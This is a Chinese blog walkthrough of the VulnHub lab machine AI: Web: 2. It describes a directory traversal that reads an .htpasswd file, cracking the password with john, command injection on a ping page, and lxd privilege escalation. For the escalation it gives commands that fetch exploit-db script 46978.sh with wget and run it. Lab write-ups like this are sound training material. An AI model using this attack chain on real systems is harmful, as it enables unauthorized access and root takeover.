AI: WEB: 2 WP

下载地址:https://www.vulnhub.com/entry/ai-web-2,357/

和1一样捏,拖入VMware打开,然后用kali扫arp得到靶机的ip地址,然后用nmap扫描端口
在这里插入图片描述
开启了80端口和22端口,开启22端口可能就是让我们拿到账户进行ssh了。

同样先去网站康康。
在这里插入图片描述
打开后是xuezhuli文件分享系统,但是没有可以点击的按钮。在exploit-db上可以搜到XuezhuLi FileSharing存在目录穿越漏洞,可以进行任意文件读取。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
读了一些文件都是没用的,最后读到了apache的认证文件/etc/apache2/.htpasswd
在这里插入图片描述
可以看出这是一个用户名和密码,不过密码加密了,我么用john来破解一下,这里用的字典就是题目说明里提到的字典了在这里插入图片描述
字典地址:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt

在这里插入图片描述
用户名为aiweb2admin 密码为c.ronaldo
先尝试进行ssh登录,但是不是。那应该是别的地方的了。又没有头绪了,去扫一下网站目录吧。
在这里插入图片描述
扫到一个webadmin目录,而且需要登陆,试一下刚才的账户,成功登录。在这里插入图片描述
查看robots.txt又发现两个目录并且第一个目录是ping命令,立马想到命令注入。试了; & | 发现 | 可以进行命令注入

在这里插入图片描述
不过反弹shell和文件上传都失败了,那就翻翻文件吧,但是翻了半天也没翻到有用的,可能有隐藏文件吧

find / -name .*

在这里插入图片描述
找到一个可能有账户的文件,查看的到一个账户在这里插入图片描述
这次去ssh应该能登陆力
在这里插入图片描述
并且发现当前用户在lxd组,可以利用lxd进行提权
https://blog.csdn.net/qq_45290991/article/details/118436123

先利用kali的searchsploit搜索lxd在这里插入图片描述
然后将此脚本放入apache目录下方便后面wget

cp /usr/share/exploitdb/exploits/linux/local/46978.sh /var/www/html

然后从GitHub库下载构建好的Alpine:

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

运行成功后出生成一个新的带有当前日期的tar.gz文件(如果运行失败可以试试开着vpn运行)

然后在靶机中利用wget下载46978.sh以及刚刚生成的tar.gz。

wget http://xxx.xxx.xxx.xxx/46978.sh

然后运行脚本

chmod 777 46978.sh
chmod 777 alpine-v3.17-i686-20230410_2356.tar.gz
./46978.sh -f alpine-v3.17-i686-20230410_2356.tar.gz

在这里插入图片描述
可能会爆这样的错误,sed -i "s/\r//" 46978.sh 运行此条命令即可解决。

在这里插入图片描述
在这里插入图片描述
overover!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值